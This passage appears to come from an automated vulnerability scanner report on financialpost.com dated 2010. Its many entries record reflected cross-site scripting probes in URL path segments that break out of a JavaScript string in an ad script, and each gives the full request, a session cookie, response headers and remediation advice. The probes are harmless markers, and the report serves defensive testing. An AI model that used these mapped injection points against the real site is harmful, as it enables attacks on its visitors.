This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726565bd'%3b35fb979a5ac/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 64674
Expires: Sun, 19 Dec 2010 03:11:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:54 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/elderly-brain-makes-riskier-investments/3983726565bd';35fb979a5ac/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=elderly-brain-makes-riskier-investments;kw=3983726565bd';35fb979a5ac;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+ ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a48af'%3b7e65cea9d7b was submitted in the REST URL parameter 4. This input was echoed as a48af';7e65cea9d7b in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Elderly+brain+makes+riskier+investments/3983726/a48af'%3b7e65cea9d7b HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38793
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3bd2'%3b4a915ea03ce was submitted in the REST URL parameter 1. This input was echoed as a3bd2';4a915ea03ce in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-financea3bd2'%3b4a915ea03ce/Retired+forgotten/3953088/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 83722
Expires: Sun, 19 Dec 2010 03:10:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:10:55 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-financea3bd2';4a915ea03ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-financea3bd2';4a915ea03ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=34415371?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55b32'%3b7da1471c85e was submitted in the REST URL parameter 3. This input was echoed as 55b32';7da1471c85e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/395308855b32'%3b7da1471c85e/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 69813
Expires: Sun, 19 Dec 2010 03:11:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:23 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/retired-forgotten/395308855b32';7da1471c85e/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=retired-forgotten;kw=395308855b32';7da1471c85e;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=70920 ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4833e'%3bb4e5a632b37 was submitted in the REST URL parameter 4. This input was echoed as 4833e';b4e5a632b37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Retired+forgotten/3953088/4833e'%3bb4e5a632b37 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44021
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13e57'%3bca94ef828cc was submitted in the REST URL parameter 1. This input was echoed as 13e57';ca94ef828cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance13e57'%3bca94ef828cc/Warning+Asset+bubbles+underway/3976343/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 82115
Expires: Sun, 19 Dec 2010 03:11:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:43 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance13e57';ca94ef828cc/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance13e57';ca94ef828cc;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=93912031?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784df'%3bc9402d5d1b0 was submitted in the REST URL parameter 3. This input was echoed as 784df';c9402d5d1b0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Warning+Asset+bubbles+underway/3976343784df'%3bc9402d5d1b0/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70296
Expires: Sun, 19 Dec 2010 03:11:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:59 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/warning-asset-bubbles-underway/3976343784df';c9402d5d1b0/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=warning-asset-bubbles-underway;kw=3976343784df';c9402d5d1b0;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundT ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 879f7'%3b7d1d07044c2 was submitted in the REST URL parameter 4. This input was echoed as 879f7';7d1d07044c2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Warning+Asset+bubbles+underway/3976343/879f7'%3b7d1d07044c2 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:12:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:12:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44395
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 89866'%3bf41ed662908 was submitted in the REST URL parameter 1. This input was echoed as 89866';f41ed662908 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance89866'%3bf41ed662908/Where+retire+Florida+most+popular+state/3994547/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 74641
Expires: Sun, 19 Dec 2010 03:11:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:26 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance89866';f41ed662908/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance89866';f41ed662908;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=43050737?"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3844d'%3b1b9f456cfaa was submitted in the REST URL parameter 3. This input was echoed as 3844d';1b9f456cfaa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Where+retire+Florida+most+popular+state/39945473844d'%3b1b9f456cfaa/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 70626
Expires: Sun, 19 Dec 2010 03:11:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/where-retire-florida-most-popular-state/39945473844d';1b9f456cfaa/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=where-retire-florida-most-popular-state;kw=39945473844d';1b9f456cfaa;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b00d'%3bf31fe2aaa22 was submitted in the REST URL parameter 4. This input was echoed as 4b00d';f31fe2aaa22 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/Where+retire+Florida+most+popular+state/3994547/4b00d'%3bf31fe2aaa22 HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 38837
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d6ed'%3baddeb4e43f0 was submitted in the REST URL parameter 1. This input was echoed as 6d6ed';addeb4e43f0 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance6d6ed'%3baddeb4e43f0/family/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:30 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37666
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 617d4'%3b9f9a6a368a8 was submitted in the REST URL parameter 2. This input was echoed as 617d4';9f9a6a368a8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family617d4'%3b9f9a6a368a8/ HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Dec 2010 03:11:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 43473
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4152d'%3b4ecd86d44f was submitted in the REST URL parameter 1. This input was echoed as 4152d';4ecd86d44f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance4152d'%3b4ecd86d44f/family/Landlord+held+hostage+real+estate+investments/3988718/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 78721
Expires: Sun, 19 Dec 2010 03:11:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance4152d';4ecd86d44f/family/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance4152d';4ecd86d44f;kw=family;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=27744648?">
...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7bc86'%3bfc78e586a48 was submitted in the REST URL parameter 2. This input was echoed as 7bc86';fc78e586a48 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/family7bc86'%3bfc78e586a48/Landlord+held+hostage+real+estate+investments/3988718/story.html HTTP/1.1
Host: www.financialpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 86485
Expires: Sun, 19 Dec 2010 03:11:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 03:11:36 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/personal-finance/family7bc86';fc78e586a48/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=personal-finance;kw=family7bc86';fc78e586a48;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=64106571?">
...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9f536'%3bbcf3f98d4ac was submitted in the REST URL parameter 4. This input was echoed as 9f536';bcf3f98d4ac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
